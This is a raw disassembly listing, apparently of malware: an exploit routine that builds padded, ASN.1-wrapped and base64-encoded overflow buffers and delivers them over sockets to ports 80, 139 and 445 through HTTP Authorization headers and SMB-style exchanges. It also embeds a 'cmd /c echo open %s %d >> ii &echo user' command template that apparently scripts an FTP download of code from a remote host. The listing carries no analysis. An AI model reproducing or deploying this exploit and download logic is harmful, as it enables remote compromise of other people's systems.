mov eax, [esi]
test eax, eax
jz short loc_4038C5
push eax
call sub_417C3B
pop ecx
loc_4038C5: ; CODE XREF: sub_4038B5+7�j
and dword ptr [esi+4], 0
and dword ptr [esi], 0
pop esi
retn
sub_4038B5 endp
; =============== S U B R O U T I N E =======================================
sub_4038CE proc near ; CODE XREF: sub_40395A+20�p
; sub_403A35+8�p ...
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi+4]
cmp eax, 0FFFFh
jge short loc_4038FB
xor ebx, ebx
cmp eax, 7Fh
setnl bl
dec ebx
and ebx, 0FFFFFFFEh
add ebx, 3
add eax, ebx
push eax
call sub_417B89
mov edi, eax
pop ecx
test edi, edi
jnz short loc_4038FF
loc_4038FB: ; CODE XREF: sub_4038CE+D�j
xor al, al
jmp short loc_403956
; ---------------------------------------------------------------------------
loc_4038FF: ; CODE XREF: sub_4038CE+2B�j
mov eax, ebx
add eax, [esi+4]
push eax
push 0
push edi
call sub_417330
add esp, 0Ch
cmp ebx, 1
jnz short loc_403924
mov al, [esi+4]
mov [edi], al
push dword ptr [esi+4]
lea eax, [edi+1]
push dword ptr [esi]
jmp short loc_40393E
; ---------------------------------------------------------------------------
loc_403924: ; CODE XREF: sub_4038CE+45�j
mov byte ptr [edi], 82h
mov eax, [esi+4]
sar eax, 8
mov [edi+1], al
mov al, [esi+4]
mov [edi+2], al
push dword ptr [esi+4]
lea eax, [edi+3]
push dword ptr [esi]
loc_40393E: ; CODE XREF: sub_4038CE+54�j
push eax
call sub_417390
add esp, 0Ch
push dword ptr [esi]
call sub_417C3B
add [esi+4], ebx
pop ecx
mov [esi], edi
mov al, 1
loc_403956: ; CODE XREF: sub_4038CE+2F�j
pop edi
pop esi
pop ebx
retn
sub_4038CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40395A proc near ; CODE XREF: sub_403A90+89�p
; sub_403A90+E3�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push edi
lea ecx, [ebp+var_8]
push dword ptr [esi+4]
push dword ptr [esi]
push 1
push offset dword_436EF4
call sub_403860
lea ecx, [ebp+var_8]
call sub_4038CE
mov eax, [ebp+var_4]
inc eax
push eax
call sub_417B89
mov edi, eax
pop ecx
test edi, edi
jnz short loc_403994
xor al, al
jmp short loc_4039D0
; ---------------------------------------------------------------------------
loc_403994: ; CODE XREF: sub_40395A+34�j
mov eax, [ebp+var_4]
inc eax
push eax
push 0
push edi
call sub_417330
mov byte ptr [edi], 3
push [ebp+var_4]
lea eax, [edi+1]
push [ebp+var_8]
push eax
call sub_417390
add esp, 18h
mov ecx, esi
call sub_4038B5
mov eax, [ebp+var_4]
lea ecx, [ebp+var_8]
inc eax
mov [esi], edi
mov [esi+4], eax
call sub_4038B5
mov al, 1
loc_4039D0: ; CODE XREF: sub_40395A+38�j
pop edi
pop esi
leave
retn
sub_40395A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4039D4 proc near ; CODE XREF: sub_403A08+14�p
; sub_403A25+8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push [ebp+arg_4]
lea ecx, [ebp+var_8]
push [ebp+arg_0]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_403860
mov ecx, esi
call sub_4038B5
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
pop esi
leave
retn 8
sub_4039D4 endp
; =============== S U B R O U T I N E =======================================
sub_403A08 proc near ; CODE XREF: sub_403A90+F0�p
; sub_403A90+15B�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_417AB0
pop ecx
push eax
mov ecx, esi
push [esp+8+arg_0]
call sub_4039D4
pop esi
retn 4
sub_403A08 endp
; =============== S U B R O U T I N E =======================================
sub_403A25 proc near ; CODE XREF: sub_403A71+B�p
; sub_403A90+1A1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_4039D4
retn 8
sub_403A25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A35 proc near ; CODE XREF: sub_403A71+16�p
; sub_403A90+91�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
call sub_4038CE
test al, al
jz short loc_403A6E
push dword ptr [esi+4]
lea ecx, [ebp+var_8]
push dword ptr [esi]
push 1
push (offset loc_4289A7+1)
call sub_403860
mov ecx, esi
call sub_4038B5
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
loc_403A6E: ; CODE XREF: sub_403A35+F�j
pop esi
leave
retn
sub_403A35 endp
; =============== S U B R O U T I N E =======================================
sub_403A71 proc near ; CODE XREF: sub_403A90+134�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_403A25
test al, al
jz short loc_403A8C
mov ecx, esi
call sub_403A35
loc_403A8C: ; CODE XREF: sub_403A71+12�j
pop esi
retn 8
sub_403A71 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A90 proc near ; CODE XREF: _0:00404315�p
var_858 = byte ptr -858h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 858h
push ebx
push edi
lea ecx, [ebp+var_48]
call sub_40381C
mov edi, 408h
cmp [ebp+arg_8], edi
jg loc_403DE4
mov ebx, [ebp+arg_10]
lea eax, [ebx+8]
cmp eax, edi
ja loc_403DE4
push esi
lea ecx, [ebp+var_30]
call sub_40381C
lea ecx, [ebp+var_20]
call sub_40381C
lea ecx, [ebp+var_50]
call sub_40381C
lea ecx, [ebp+var_18]
call sub_40381C
lea ecx, [ebp+var_40]
call sub_40381C
lea ecx, [ebp+var_38]
call sub_40381C
lea ecx, [ebp+var_28]
call sub_40381C
push 4
push offset dword_428648
lea ecx, [ebp+var_30]
call sub_4039D4
push 3
push offset dword_428650
lea ecx, [ebp+var_30]
call sub_4039D4
lea ecx, [ebp+var_30]
call sub_40395A
lea ecx, [ebp+var_30]
call sub_403A35
mov esi, 800h
lea eax, [ebp+var_858]
push esi
push 42h
push eax
call sub_417330
add esp, 0Ch
lea ecx, [ebp+var_20]
push 8
push offset byte_42863C
call sub_4039D4
push ebx
lea ecx, [ebp+var_20]
push [ebp+arg_C]
call sub_4039D4
mov eax, 409h
lea ecx, [ebp+var_20]
sub eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_858]
push eax
call sub_4039D4
lea ecx, [ebp+var_20]
call sub_40395A
push offset loc_4289D0
lea ecx, [ebp+var_50]
call sub_403A08
lea ecx, [ebp+var_50]
call sub_40395A
push esi
lea eax, [ebp+var_858]
push 44h
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_58]
push 410h
push eax
call sub_403826
lea ecx, [ebp+var_58]
call sub_40395A
push [ebp+var_54]
lea ecx, [ebp+var_50]
push [ebp+var_58]
call sub_403A71
lea ecx, [ebp+var_58]
call sub_4038B5
push esi
lea eax, [ebp+var_858]
push 43h
push eax
call sub_417330
add esp, 0Ch
push offset aCccc ; "CCCC"
lea ecx, [ebp+var_18]
call sub_403A08
push 4
push offset dword_428654
lea ecx, [ebp+var_18]
call sub_4039D4
push [ebp+arg_8]
lea ecx, [ebp+var_18]
push [ebp+arg_4]
call sub_4039D4
sub edi, [ebp+arg_8]
lea eax, [ebp+var_858]
lea ecx, [ebp+var_18]
push edi
push eax
call sub_4039D4
lea ecx, [ebp+var_18]
call sub_40395A
push [ebp+var_14]
lea ecx, [ebp+var_40]
push [ebp+var_18]
call sub_403A25
push [ebp+var_4C]
lea ecx, [ebp+var_40]
push [ebp+var_50]
call sub_403A25
lea ecx, [ebp+var_40]
call sub_403A35
lea ecx, [ebp+var_18]
call sub_4038B5
lea ecx, [ebp+var_50]
call sub_4038B5
push [ebp+var_1C]
lea ecx, [ebp+var_38]
push [ebp+var_20]
call sub_403A25
push [ebp+var_2C]
lea ecx, [ebp+var_38]
push [ebp+var_30]
call sub_403A25
push [ebp+var_3C]
lea ecx, [ebp+var_38]
push [ebp+var_40]
call sub_403A25
lea ecx, [ebp+var_38]
call sub_403A35
lea ecx, [ebp+var_20]
call sub_4038B5
lea ecx, [ebp+var_30]
call sub_4038B5
lea ecx, [ebp+var_40]
call sub_4038B5
push esi
lea eax, [ebp+var_858]
push 41h
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_28]
push 400h
push eax
call sub_4039D4
lea ecx, [ebp+var_28]
call sub_40395A
push 2
push offset dword_4289C4
lea ecx, [ebp+var_28]
call sub_4039D4
push [ebp+var_34]
lea ecx, [ebp+var_28]
push [ebp+var_38]
call sub_403A25
lea ecx, [ebp+var_28]
call sub_403A35
lea ecx, [ebp+var_38]
call sub_4038B5
lea ecx, [ebp+var_10]
call sub_40381C
lea ecx, [ebp+var_8]
call sub_40381C
push [ebp+var_24]
lea ecx, [ebp+var_10]
push [ebp+var_28]
call sub_403A25
lea ecx, [ebp+var_10]
call sub_4038CE
lea ecx, [ebp+var_28]
call sub_4038B5
push offset dword_4289C0
lea ecx, [ebp+var_8]
call sub_403A08
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_403A25
lea ecx, [ebp+var_8]
call sub_4038CE
lea ecx, [ebp+var_10]
call sub_4038B5
push offset dword_4289BC
lea ecx, [ebp+var_10]
call sub_403A08
push [ebp+var_4]
lea ecx, [ebp+var_10]
push [ebp+var_8]
call sub_403A25
lea ecx, [ebp+var_10]
call sub_4038CE
lea ecx, [ebp+var_8]
call sub_4038B5
push offset dword_4289B0
lea ecx, [ebp+var_8]
call sub_403A08
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_403A25
lea ecx, [ebp+var_8]
call sub_4038CE
lea ecx, [ebp+var_10]
call sub_4038B5
push offset dword_4289AC
lea ecx, [ebp+var_48]
call sub_403A08
push [ebp+var_4]
lea ecx, [ebp+var_48]
push [ebp+var_8]
call sub_403A25
lea ecx, [ebp+var_8]
call sub_4038B5
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
pop esi
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
jmp short loc_403DF2
; ---------------------------------------------------------------------------
loc_403DE4: ; CODE XREF: sub_403A90+1B�j
; sub_403A90+29�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
loc_403DF2: ; CODE XREF: sub_403A90+352�j
pop edi
pop ebx
leave
retn
sub_403A90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403DF6 proc near ; CODE XREF: sub_403EBA+A1�p
; sub_403EBA+C2�p ...
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push esi
push edi
mov esi, [ebp+arg_0]
push 1
pop edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_210]
and [ebp+var_4], 0
push eax
lea eax, [ebp+var_10C]
push 0
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
mov [ebp+var_20C], esi
mov [ebp+var_210], edi
mov [ebp+var_8], 0Ah
call ds:dword_42420C ;; select
cmp eax, edi
jnz short loc_403E5D
lea eax, [ebp+var_10C]
push eax
push esi
call sub_422A46 ; __WSAFDIsSet
test eax, eax
jnz short loc_403E61
loc_403E5D: ; CODE XREF: sub_403DF6+54�j
xor eax, eax
jmp short loc_403E71
; ---------------------------------------------------------------------------
loc_403E61: ; CODE XREF: sub_403DF6+65�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call ds:dword_43ADB0 ;; recv
loc_403E71: ; CODE XREF: sub_403DF6+69�j
pop edi
pop esi
leave
retn
sub_403DF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403E75 proc near ; CODE XREF: sub_403EBA+81�p
; sub_403EBA+AB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
call ds:dword_43AD94 ;; htonl
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push 4
push eax
push [ebp+arg_0]
call ds:dword_43ADE8 ;; send
cmp eax, 4
jz short loc_403E9F
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_403E9F: ; CODE XREF: sub_403E75+24�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_43ADE8 ;; send
sub eax, [ebp+arg_8]
neg eax
sbb eax, eax
inc eax
leave
retn
sub_403E75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403EBA proc near ; CODE XREF: sub_403F94+48�p
; _0:00404406�p
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea ebx, [edi+41h]
push ebx
mov [ebp+var_4], ebx
call sub_417B89
mov esi, eax
pop ecx
test esi, esi
jnz short loc_403EE3
xor al, al
jmp loc_403F8F
; ---------------------------------------------------------------------------
loc_403EE3: ; CODE XREF: sub_403EBA+20�j
push ebx
push 0
push esi
call sub_417330
push 2Fh
push offset dword_4286E4
push esi
call sub_417390
push 8
lea eax, [esi+31h]
push offset dword_428714
push eax
mov [esi+2Fh], di
call sub_417390
push edi
lea ebx, [esi+3Bh]
push [ebp+arg_4]
mov [esi+39h], di
push ebx
call sub_417390
push 6
add ebx, edi
push offset dword_436EEC
push ebx
call sub_417390
mov ebx, [ebp+arg_0]
push 85h
push offset dword_42865C
push ebx
call sub_403E75
add esp, 48h
test al, al
jnz short loc_403F4B
loc_403F47: ; CODE XREF: sub_403EBA+B5�j
xor bl, bl
jmp short loc_403F86
; ---------------------------------------------------------------------------
loc_403F4B: ; CODE XREF: sub_403EBA+8B�j
mov edi, 100h
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_403DF6
push [ebp+var_4]
push esi
push ebx
call sub_403E75
add esp, 1Ch
test al, al
jz short loc_403F47
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_403DF6
add esp, 10h
mov bl, 1
loc_403F86: ; CODE XREF: sub_403EBA+8F�j
push esi
call sub_417C3B
pop ecx
mov al, bl
loc_403F8F: ; CODE XREF: sub_403EBA+24�j
pop edi
pop esi
pop ebx
leave
retn
sub_403EBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403F94 proc near ; CODE XREF: _0:004043EC�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0
push 48h
push offset unk_428720
push [ebp+arg_0]
call ds:dword_424208 ;; send
cmp eax, 48h
jnz short loc_403FCF
push 0
lea eax, [ebp+var_20]
push 20h
push eax
push [ebp+arg_0]
call sub_403DF6
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_403FCF
cmp [ebp+var_20], 82h
jz short loc_403FD3
loc_403FCF: ; CODE XREF: sub_403F94+1B�j
; sub_403F94+33�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_403FD3: ; CODE XREF: sub_403F94+39�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_403EBA
add esp, 0Ch
leave
retn
sub_403F94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403FE6 proc near ; CODE XREF: sub_404032+2D�p
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
and dword ptr [ebp+var_8+4], 0
shl eax, 3
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
fmul ds:dbl_424278
call sub_417DC4
and dword ptr [ebp+var_8+4], 0
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
push ecx
push ecx ; double
fst [ebp+var_8]
fmul ds:dbl_424270
fstp [esp+10h+var_10]
call sub_417CA4
fadd st, st
pop ecx
pop ecx
fadd [ebp+var_8]
call sub_417DC4
inc eax
leave
retn
sub_403FE6 endp
; =============== S U B R O U T I N E =======================================
sub_404032 proc near ; CODE XREF: sub_4041D4+24�p
var_40 = qword ptr -40h
mov eax, offset loc_4230E7
call sub_418290
sub esp, 2Ch
mov al, [ebp+13h]
push ebx
push esi
push edi
xor edi, edi
lea ecx, [ebp-38h]
push edi
mov [ebp-20h], edi
mov [ebp-38h], al
call sub_404667
push 1
pop ebx
push dword ptr [ebp+10h]
mov [ebp-4], ebx
call sub_403FE6
cmp [ebp-2Ch], eax
pop ecx
jnb short loc_404074
push edi
push eax
lea ecx, [ebp-38h]
call sub_4045E2
loc_404074: ; CODE XREF: sub_404032+36�j
cmp [ebp+10h], edi
mov [ebp-18h], edi
jbe loc_404191
mov ebx, [ebp+10h]
loc_404083: ; CODE XREF: sub_404032+156�j
cmp dword ptr [ebp+10h], 3
jb short loc_40408D
push 3
jmp short loc_40409F
; ---------------------------------------------------------------------------
loc_40408D: ; CODE XREF: sub_404032+55�j
cmp dword ptr [ebp+10h], 2
jnz short loc_404097
push 2
jmp short loc_40409F
; ---------------------------------------------------------------------------
loc_404097: ; CODE XREF: sub_404032+5F�j
cmp dword ptr [ebp+10h], 1
jnz short loc_4040A0
push 1
loc_40409F: ; CODE XREF: sub_404032+59�j
; sub_404032+63�j
pop ebx
loc_4040A0: ; CODE XREF: sub_404032+69�j
mov [ebp-28h], ebx
mov [ebp-24h], edi
fild qword ptr [ebp-28h]
push ecx
push ecx ; double
fmul ds:dbl_424288
fstp [esp+40h+var_40]
call sub_417DEB
pop ecx
pop ecx
call sub_417DC4
cmp ebx, edi
mov [ebp-1Ch], eax
jbe short loc_4040DF
mov esi, [ebp+0Ch]
mov ecx, ebx
mov edx, ecx
lea edi, [ebp-10h]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
xor edi, edi
loc_4040DF: ; CODE XREF: sub_404032+93�j
mov cl, [ebp-10h]
mov dl, [ebp-10h]
sar cl, 2
and cl, 3Fh
and dl, 3
mov [ebp-14h], cl
mov cl, [ebp-0Fh]
sar cl, 4
and cl, 0Fh
add [ebp+0Ch], ebx
shl dl, 4
add cl, dl
mov dl, [ebp-0Fh]
mov [ebp-13h], cl
mov cl, [ebp-0Eh]
sar cl, 6
and dl, 0Fh
sub [ebp+10h], ebx
and cl, 3
xor esi, esi
shl dl, 2
add cl, dl
mov [ebp-12h], cl
mov cl, [ebp-0Eh]
and cl, 3Fh
cmp eax, edi
mov [ebp-11h], cl
jbe short loc_40414D
add [ebp-18h], eax
loc_404131: ; CODE XREF: sub_404032+119�j
movsx eax, byte ptr [ebp+esi-14h]
lea ecx, [ebp-38h]
mov al, ds:byte_42876C[eax]
push eax
push 1
call sub_404464
inc esi
cmp esi, [ebp-1Ch]
jb short loc_404131
loc_40414D: ; CODE XREF: sub_404032+FA�j
cmp dword ptr [ebp-18h], 48h
jb short loc_40416B
push dword ptr [ebp+14h]
call sub_417AB0
pop ecx
push eax
lea ecx, [ebp-38h]
push dword ptr [ebp+14h]
call sub_4044BD
mov [ebp-18h], edi
loc_40416B: ; CODE XREF: sub_404032+11F�j
push 4
pop esi
cmp [ebp-1Ch], esi
jnb short loc_404185
sub esi, [ebp-1Ch]
loc_404176: ; CODE XREF: sub_404032+151�j
push 3Dh
push 1
lea ecx, [ebp-38h]
call sub_404464
dec esi
jnz short loc_404176
loc_404185: ; CODE XREF: sub_404032+13F�j
cmp [ebp+10h], edi
ja loc_404083
push 1
pop ebx
loc_404191: ; CODE XREF: sub_404032+48�j
mov esi, [ebp+8]
mov al, [ebp-38h]
push edi
mov ecx, esi
mov [esi], al
call sub_404667
push ds:dword_424280
lea eax, [ebp-38h]
mov ecx, esi
push edi
push eax
call sub_404514
mov [ebp-20h], ebx
and byte ptr [ebp-4], 0
push ebx
lea ecx, [ebp-38h]
call sub_404667
mov ecx, [ebp-0Ch]
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_404032 endp
; =============== S U B R O U T I N E =======================================
sub_4041D4 proc near ; CODE XREF: _0:004043CF�p
mov eax, offset loc_423104
call sub_418290
sub esp, 10h
push ebx
push esi
push edi
push offset byte_436EDC
lea eax, [ebp-1Ch]
push dword ptr [ebp+10h]
xor ebx, ebx
mov [ebp-4], ebx
push dword ptr [ebp+0Ch]
push eax
call sub_404032
mov eax, [ebp+1Ch]
mov ecx, [ebp-14h]
mov byte ptr [ebp-4], 1
lea esi, [ecx+eax+36h]
push esi
call sub_417B89
mov edi, eax
add esp, 14h
cmp edi, ebx
jnz short loc_40421E
xor bl, bl
jmp short loc_404262
; ---------------------------------------------------------------------------
loc_40421E: ; CODE XREF: sub_4041D4+44�j
mov ecx, [ebp-18h]
mov eax, offset dword_424290
cmp ecx, ebx
jnz short loc_40422C
mov ecx, eax
loc_40422C: ; CODE XREF: sub_4041D4+54�j
cmp [ebp+18h], ebx
jz short loc_404234
mov eax, [ebp+18h]
loc_404234: ; CODE XREF: sub_4041D4+5B�j
push ecx
push eax
push offset aGetHttp1_0Host ; "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
push esi
push edi
call sub_41782A
add esp, 14h
push ebx
push esi
push edi
push dword ptr [ebp+8]
call ds:dword_43ADE8 ;; send
cmp eax, esi
jz short loc_404259
xor bl, bl
jmp short loc_40425B
; ---------------------------------------------------------------------------
loc_404259: ; CODE XREF: sub_4041D4+7F�j
mov bl, 1
loc_40425B: ; CODE XREF: sub_4041D4+83�j
push edi
call sub_417C3B
pop ecx
loc_404262: ; CODE XREF: sub_4041D4+48�j
and byte ptr [ebp-4], 0
push 1
lea ecx, [ebp-1Ch]
call sub_404667
or dword ptr [ebp-4], 0FFFFFFFFh
push 1
lea ecx, [ebp+14h]
call sub_404667
mov ecx, [ebp-0Ch]
pop edi
mov al, bl
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_4041D4 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 420h
and byte ptr [ebp-420h], 0
push ebx
push esi
push edi
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp-41Fh]
push 8Fh
rep stosd
stosw
stosb
lea eax, [ebp-420h]
push offset sub_428918
push eax
call sub_417390
add esp, 0Ch
mov eax, offset byte_42F674
push eax
push eax
push ds:dword_436F0C
push dword ptr [ebp+8]
call sub_40AEE0
pop ecx
push eax
push offset aCmdCEchoOpenSD ; "cmd /c echo open %s %d >> ii &echo user"...
lea eax, [ebp-391h]
push 400h
push eax
call sub_41782A
add eax, 90h
push eax
lea eax, [ebp-420h]
push eax
push 164h
lea eax, [ebp-8]
push offset sub_4287B0
push eax
call sub_403A90
xor esi, esi
add esp, 30h
cmp [ebp-4], esi
jnz short loc_40432B
xor eax, eax
jmp loc_404457
; ---------------------------------------------------------------------------
loc_40432B: ; CODE XREF: _0:00404322�j
mov [ebp-0Ch], esi
loc_40432E: ; CODE XREF: _0:0040442E�j
test esi, esi
jnz loc_404434
push 6
push 1
push 2
call ds:dword_424214 ;; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40441C
xor eax, eax
lea edi, [ebp-1Ah]
stosd
push dword ptr [ebp+0A8h]
stosd
stosd
stosw
mov word ptr [ebp-1Ch], 2
call ds:dword_43AD98 ;; htons
mov [ebp-1Ah], ax
lea eax, [ebp+0Ch]
push eax
call ds:dword_43ADD8 ;; inet_addr
mov [ebp-18h], eax
lea eax, [ebp-1Ch]
push 10h
push eax
push ebx
call ds:dword_43AD40 ;; connect
cmp eax, 0FFFFFFFFh
jz loc_404411
cmp dword ptr [ebp+0A8h], 50h
jnz short loc_4043D9
mov al, [ebp+0C3h]
sub esp, 10h
mov esi, esp
mov [ebp-20h], esp
push 0
mov ecx, esi
mov [esi], al
call sub_404667
lea eax, [ebp+0Ch]
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+0Ch]
push eax
mov ecx, esi
call sub_4046A3
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_4041D4
add esp, 1Ch
jmp short loc_40440E
; ---------------------------------------------------------------------------
loc_4043D9: ; CODE XREF: _0:00404397�j
cmp dword ptr [ebp+0A8h], 8Bh
jnz short loc_4043F3
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_403F94
jmp short loc_40440B
; ---------------------------------------------------------------------------
loc_4043F3: ; CODE XREF: _0:004043E3�j
cmp dword ptr [ebp+0A8h], 1BDh
jnz short loc_404411
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_403EBA
loc_40440B: ; CODE XREF: _0:004043F1�j
add esp, 0Ch
loc_40440E: ; CODE XREF: _0:004043D7�j
movzx esi, al
loc_404411: ; CODE XREF: _0:0040438A�j _0:004043FD�j
push ebx
call ds:dword_43AE30 ;; closesocket
test esi, esi
jnz short loc_404427
loc_40441C: ; CODE XREF: _0:00404347�j
push 3E8h
call ds:dword_424064 ;; Sleep
loc_404427: ; CODE XREF: _0:0040441A�j
inc dword ptr [ebp-0Ch]
cmp dword ptr [ebp-0Ch], 2
jl loc_40432E
loc_404434: ; CODE XREF: _0:00404330�j
lea ecx, [ebp-8]
call sub_4038B5
test esi, esi
jz short loc_404455
mov eax, [ebp+0B0h]
imul eax, 3Ch
inc ds:dword_42ACB8[eax]
lea eax, dword_42ACB8[eax]
loc_404455: ; CODE XREF: _0:0040443E�j
mov eax, esi
loc_404457: ; CODE XREF: _0:00404326�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4230C8
loc_40445C: ; CODE XREF: sub_4230C8+3�j
; _0:004230E1�j ...
push 1
call sub_404667
retn
; END OF FUNCTION CHUNK FOR sub_4230C8
; =============== S U B R O U T I N E =======================================
sub_404464 proc near ; CODE XREF: sub_404032+110�p
; sub_404032+14B�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
mov eax, ds:dword_424280
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, ecx
push edi
sub eax, [esi+8]
cmp eax, ebx
ja short loc_40447E
call sub_42298A
loc_40447E: ; CODE XREF: sub_404464+13�j
test ebx, ebx
jbe short loc_4044B5
mov edi, ebx
push 0
add edi, [esi+8]
mov ecx, esi
push edi
call sub_4045E2
test al, al
jz short loc_4044B5
movsx eax, [esp+0Ch+arg_4]
push ebx
push eax
mov eax, [esi+4]
add eax, [esi+8]
push eax
call sub_417330
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [eax+edi], 0
loc_4044B5: ; CODE XREF: sub_404464+1C�j
; sub_404464+2F�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_404464 endp
; =============== S U B R O U T I N E =======================================
sub_4044BD proc near ; CODE XREF: sub_404032+131�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, ds:dword_424280
push ebx
mov ebx, [esp+4+arg_4]
push esi
mov esi, ecx
push edi
sub eax, [esi+8]
cmp eax, ebx
ja short loc_4044D7
call sub_42298A
loc_4044D7: ; CODE XREF: sub_4044BD+13�j
test ebx, ebx
jbe short loc_40450C
mov edi, ebx
push 0
add edi, [esi+8]
mov ecx, esi
push edi
call sub_4045E2
test al, al
jz short loc_40450C
mov eax, [esi+8]
push ebx
push [esp+10h+arg_0]
add eax, [esi+4]
push eax
call sub_417390
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [edi+eax], 0
loc_40450C: ; CODE XREF: sub_4044BD+1C�j
; sub_4044BD+2F�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_4044BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404514 proc near ; CODE XREF: sub_404032+17C�p
; sub_4228A0+15�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
mov edi, ecx
